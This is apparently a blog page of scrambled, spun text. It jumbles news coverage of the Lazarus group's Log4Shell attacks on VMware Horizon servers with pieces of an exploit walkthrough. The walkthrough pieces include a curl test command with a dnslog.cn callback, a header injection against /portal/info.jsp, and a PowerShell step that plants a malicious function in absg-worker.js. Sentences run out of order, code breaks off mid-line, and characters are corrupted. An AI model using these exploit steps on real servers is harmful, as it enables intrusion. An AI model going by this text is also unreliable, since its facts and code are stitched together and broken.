AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |
Back to Blog
VSingle serves as a reconnaissance, backdoor and exfiltration tool to execute arbitrary code, download plugins, and create the possibility of lateral movement. Lazarus first establishes a reverse shell and manually sets up a backdoor into the compromised systems through VSingle, which then allows it to establish another reverse shell. The company clarified that Symantec and South Korea’s AhnLab previously detailed the campaign but Lazarus has updated its M.O., evident from the use of MagicRAT. Once in, Lazarus deployed VSingle and YamaBot, two malware strains exclusive to its operations, and a third “relatively simple” remote access trojan dubbed MagicRAT by Cisco Talos. #Vmware horizon hackers servers are exploit PatchCSRB assessed that it could take up to a decade, maybe more, for organizations worldwide to patch Log4Shell flaws. In July 2022, the Department of Homeland Security’s Cyber Safety Review Board (CSRB) described Log4Shell vulnerabilities as endemic given the ubiquity of Log4j across a multitude of computer and industrial control systems, servers, and networks. This poses a huge threat to some of the most critical systems within the critical infrastructure space.” However, it seems there are still systems that have not been patched yet. “In June of 2022, CISA issued an alert (AA22-174A) specifically addressing this threat. However, our adversaries are still able to find and exploit unpatched sites that are directly connected to the internet,” Erich Kron, security awareness advocate at KnowBe4, told Spiceworks. “The Log4j exploit used in these attacks has been known, and called critical, for over a year. Lazarus’ established its initial entry point into internet-facing VMware Horizon installations by exploiting the highly prevalent Log4Shell vulnerabilities in the Java-based logging framework Log4j. According to threat research firm Cisco Talos, APT38’s campaign was active until July this year. The nation-state group kicked off its latest campaign against energy companies in February 2022, a couple of months before the Ronin Network crypto heist. It was also behind the WannaCry ransomware attack in 2017 and other data exfiltration and cyber espionage activities. According to Cisco Talos, APT 38 targets VMWare Horizon instances by exploiting the widely prevalent Log4j vulnerabilities.ĪPT38, commonly known as Lazarus and Hidden Cobra, is a North Korean state-sponsored cybercrime group that earned infamy by orchestrating the $620 million Ronin Network crypto heist, the biggest cryptocurrency theft in history, in April 2022. The PowerShell command then inserts a function similar to the one shown below: if (String(req.url).North Korean Advanced Persistent Threat (APT) group APT38, also known as the Lazarus group, is targeting energy companies in the U.S., Japan, and Canada. It only occurs once in the absg-worker.js file and provides us with a great place to place a malicious function. What is happening on that line is widely irrelevant to the attacker. The command first looks for a line containing the text, “()”. In my opinion, whoever wrote that deserves a medal. To test for the vulnerability, let’s first grab a hostname from dnslog.cn and insert it in the following cURL command: curl -vv -H "Accept-Language: \$|Set-Content $path User-Agent: Mozilla/5.0 (Windows NT 10.0 Win64 圆4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/.45 Safari/537.36Īccept: text/html,application/xhtml xml,application/xml q=0.9,image/avif,image/webp,image/apng,*/* q=0.8,application/signed-exchange v=b3 q=0.9 The vulnerability itself is in the “Accept-Language” header issued to the endpoint “/portal/info.jsp” A complete web request to this endpoint is provided below: GET /portal/info.jsp HTTP/1.1 Navigating to the webpage for the application in a web browser will look something like the following: This part of the application serves the web application that provides browser access to Horizon services. Horizon has several components, one of which is the VMWare View framework. VMWare Horizon is used to provide a remote desktop session to users via a web browser.
0 Comments
Read More
Leave a Reply. |